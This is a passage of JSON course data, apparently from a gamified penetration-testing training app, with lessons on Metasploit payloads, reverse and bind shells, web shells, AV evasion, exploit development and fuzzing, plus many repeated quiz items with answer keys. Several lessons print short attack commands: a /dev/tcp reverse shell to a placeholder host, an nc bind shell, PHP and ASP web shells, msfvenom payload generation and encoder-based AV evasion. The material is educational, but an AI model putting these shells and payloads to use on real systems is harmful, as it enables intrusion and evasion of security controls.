strings"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"msf-payloads","cat":"Exploitation","title":"MSF Payloads","diff":1,"xp":100,"intro":"Staged vs stageless.","sections":[{"type":"text","content":"Staged vs stageless."},{"type":"code","lang":"bash","content":"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Staged vs stageless?","opts":["Speed","Staged downloads in parts, stageless is self-contained","Encryption","Platform"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"rev-shell","cat":"Exploitation","title":"Reverse Shell Techniques","diff":1,"xp":100,"intro":"Establish reverse shells.","sections":[{"type":"text","content":"Establish reverse shells."},{"type":"code","lang":"bash","content":"bash -i >& /dev/tcp/ATK/4444 0>&1\npython3 -c 'import socket,subprocess,os;...'"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why reverse over bind?","opts":["Faster","Bypasses inbound firewall","Stable","Encrypted"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"bind-shell","cat":"Exploitation","title":"Bind Shell","diff":1,"xp":75,"intro":"Listening shell on target.","sections":[{"type":"text","content":"Listening shell on target."},{"type":"code","lang":"bash","content":"nc -lvnp 4444 -e /bin/bash"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"When prefer bind shell?","opts":["Always","When you can reach the target port","Never","Encrypted"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"web-shell","cat":"Exploitation","title":"Web Shell Deployment","diff":1,"xp":100,"intro":"Upload web shells.","sections":[{"type":"text","content":"Upload web shells."},{"type":"code","lang":"bash","content":"<?php system($_GET['cmd']); ?>\n# ASP: <% eval request(\"cmd\") %>"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why persistent?","opts":["Encryption","Stored on disk as web page","Speed","Compression"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"payload-craft","cat":"Exploitation","title":"Payload Crafting","diff":1,"xp":100,"intro":"Generate multi-platform payloads.","sections":[{"type":"text","content":"Generate multi-platform payloads."},{"type":"code","lang":"bash","content":"msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe\nmsfvenom -p linux/x64/shell_reverse_tcp -f elf -o shell"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Payload gen tool?","opts":["gcc","msfvenom","nasm","python"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"av-evasion","cat":"Exploitation","title":"AV Evasion","diff":2,"xp":175,"intro":"Bypass antivirus.","sections":[{"type":"text","content":"Bypass antivirus."},{"type":"code","lang":"bash","content":"msfvenom -p ... -e x86/shikata_ga_nai -i 5 -f exe\n# Better: custom loader with runtime decryption"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why encoding alone fails?","opts":["Slow","AV detects decoder stub","Breaks function","Too large"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"exploit-dev","cat":"Exploitation","title":"Exploit Development","diff":3,"xp":250,"intro":"Systematic exploit writing.","sections":[{"type":"text","content":"Systematic exploit writing."},{"type":"code","lang":"python","content":"msf-pattern_create -l 500\nmsf-pattern_offset -l 500 -q 0x41366341"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Offset-finding tool?","opts":["gdb","msf-pattern_offset","objdump","readelf"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"fuzz-basics","cat":"Exploitation","title":"Fuzzing","diff":2,"xp":150,"intro":"Find bugs via random input.","sections":[{"type":"text","content":"Find bugs via random input."},{"type":"code","lang":"python","content":"from boofuzz import *\nsession = Session(target=Target(connection=SocketConnection('target',80)))"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Fuzzing goal?","opts":["Performance","Finding crashes via malformed input","Load test","Coverage"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower 